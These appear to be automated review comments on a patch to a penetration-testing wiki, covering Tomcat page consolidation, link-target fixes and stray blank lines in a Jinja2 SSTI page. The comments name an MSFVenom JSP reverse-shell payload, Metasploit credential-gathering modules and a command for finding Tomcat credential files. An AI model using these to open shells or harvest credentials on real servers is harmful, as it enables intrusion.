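Review bot: the `\_` to `_` edits in link targets (`hacktricks\_live` in the Support HackTricks block of four files, `Auto\_Wordlists` and the OWASP `web\_application_security_testing` URL in `pentesting-web/README.md`) are unrelated to the Tomcat consolidation that makes up the bulk of this patch, and the commit subject `No subject` does not mention them. They look correct as far as they go (only the target is unescaped; the visible link text keeps `\_`, which is still needed there so `_` is not read as emphasis), but bundling a link-target cleanup with a page merge makes the change hard to review and to revert; suggest a separate commit for the URL fixes.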
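Review bot: the payload change in the `tomcat.md` MSFVenom hunk (`java/shell_reverse_tcp` to `java/jsp_shell_reverse_tcp`) matches what the deleted `tomcat/README.md` already used, so the two copies of this section were out of sync before the patch. This is a real correction to a command readers will copy, and it deserves a line in the commit message; `GITBOOK-4443: No subject` gives no hint that a payload name was fixed.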
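Review bot: in the `tomcat.md` POST hunk the new `xml` example block contains only `[...]` placeholders and blank lines as shown in this diff, so the reader gets no actual `tomcat-users.xml` content, while the deleted `basic-tomcat-info.md` contained a complete example with roles and users that could be reused here. The same hunk also removes the two Metasploit post modules (`post/multi/gather/tomcat_gather` and `post/windows/gather/enum_tomcat`) without replacement; keep them next to the `find / -name tomcat-users.xml` command, since they are the "other ways to gather Tomcat credentials" the old text promised. Minor wording: `Name of Tomcat credentials file is `tomcat-users.xml` and this file indicates the role of the user inside tomcat` reads better as `The Tomcat credentials file is `tomcat-users.xml`; it also defines each user's roles.`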
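Review bot: every hunk in `jinja2-ssti.md` other than the twitter-URL one either inserts a lone blank `+` line inside a fenced code block (the `@@ -57`, `@@ -78`, `@@ -143`, `@@ -228` and `@@ -277` hunks) or swaps one blank line for another around the 8kSec banner (`@@ -372`). These look like editor auto-formatting rather than intended content and only pad the diff; suggest dropping them from this patch, or, if trailing blank lines inside fences are wanted, applying that formatting repo-wide in its own commit.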